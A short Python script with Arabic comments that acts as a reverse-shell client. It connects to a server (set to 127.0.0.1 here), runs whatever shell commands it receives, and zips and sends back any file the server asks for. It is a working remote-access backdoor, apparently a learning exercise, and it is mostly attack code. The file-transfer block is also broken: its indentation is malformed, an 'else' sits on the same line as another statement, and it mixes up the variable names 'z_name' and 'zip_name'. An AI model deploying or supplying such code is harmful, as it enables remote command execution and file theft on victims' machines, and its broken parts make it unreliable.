#!/bin/python3
import socket
import subprocess
import os
import zipfile
HOST = "127.0.0.1"
PORT = 12345

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((HOST, PORT))

while True:
    data = client.recv(1024).decode()

    if data == "EXIT":
        break

    # تقسيم البروتوكول
    try:
        TYPE, CONTENT = data.split("|", 1)
    except:
        continue

    # تنفيذ أوامر
    if TYPE == "CMD":
        result = subprocess.getoutput(CONTENT)
        client.sendall(result.encode())

    # إرسال ملف
    elif TYPE == "GET":
        if os.path.exists(CONTENT):
            z_name = CONTENT + ".zip"
            with zipfile.ZipFile(z_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
                zipf.write(CONTENT)             
        with open(z_name, "rb") as f:
                while True:
                    chunk = f.read(1024)
                    if not chunk:
                        break
                    client.sendall(chunk)

        client.sendall(b"EOF")
        os.remove(zip_name)        else:
            client.sendall(b"FILE_NOT_FOUND")
    # استقبال رسالة
    elif TYPE == "MSG":
        print(f"[Server Message]: {CONTENT}")

client.close()
